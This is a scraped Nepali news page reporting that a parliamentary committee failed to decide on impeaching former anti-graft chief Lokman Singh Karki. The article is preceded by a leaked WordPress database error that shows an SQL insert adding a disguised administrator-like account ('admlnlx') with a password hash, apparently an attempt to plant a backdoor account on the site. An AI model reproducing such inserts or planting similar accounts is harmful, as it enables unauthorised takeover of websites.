WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXl6hQMmoBdX.SApn0bzv5Ce46mERN/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:46:12', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ ४ –
अख्तियार दुरुपयोग अनुसन्धान आयोगका पूर्वप्रमुख आयुक्त लोकमानसिंह कार्कीलाई महाअभियोग लगाउने वा नलगाउने भन्ने विषयमा संसदको महाअभियोग सिफारिस समितिले मंगलबार पनि कुनै निर्णय गर्न सकेन ।समितिको कार्यालय सिंहदबारमा मंगलबार बसेको बैठकमा लोकमानसिंह कार्कीविरुद्ध महाअभियोग लगाउने वा नलगाउने भन्ने विषयमा छलफल भएको थियो ।
बैठकमा सुझावका लागि नेपाल कानुन आयोगका अध्यक्ष माधव पौडेल र कानुन मन्त्रालयका सचिव टेकप्रसाद ढुंगानालाई बोलाइएको थियो ।तर, समितिको बैठकमा बोलाइएका विज्ञहरुले आफूहरु तत्कालीन मन्त्रिपरिषदको सदस्य र कार्कीलाई अख्तियार प्रमुखकोरुपमा सिफारिस गर्ने संवैधानिक समितिको सदस्य रहेकाले राय दिन नमिल्ने बताएपछि बैठक कुनै निश्कर्षमा पुग्न नसकेको हो ।
पौडेल र ढुंगानाकै सल्लाहमा समितिले बुधबार (भोलि)को बैठकमा महान्यायधिवक्ता रमनकुमार श्रेष्ठलाई बोलाएको छ ।महान्यायधिवक्ताको धारणा सुनेपछि यो विषयमा समितिले बुधबार नै निर्णय लिने समितिका सदस्य पार्वत गुरुङले जानकारी दिए ।
समितिको सोमबारको बैठक पनि निश्कर्षबिना नै टुंगिएको थियो ।सर्वोच्च अदालतले कार्की अख्तियार प्रमुख हुन अयोग्य भएको फैसला गरेपछि उनी अख्तियारको जिम्मेवारीबाट भने बाहिरिइसकेका छन् ।